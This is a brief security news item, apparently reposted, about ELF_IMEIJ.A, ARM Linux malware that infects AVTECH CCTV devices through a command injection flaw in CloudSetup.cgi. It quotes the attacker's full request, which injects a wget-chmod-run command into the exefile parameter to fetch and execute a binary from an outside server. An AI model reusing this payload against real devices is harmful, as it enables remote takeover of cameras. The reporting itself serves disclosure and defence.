A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.
The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1
Why, you might ask?
ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.
Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.
The problem is that there is not whitelist-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.
Learn more / En savoir plus / Mehr erfahren:
http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux
http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot
Learn more / En savoir plus / Mehr erfahren:
http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux
http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot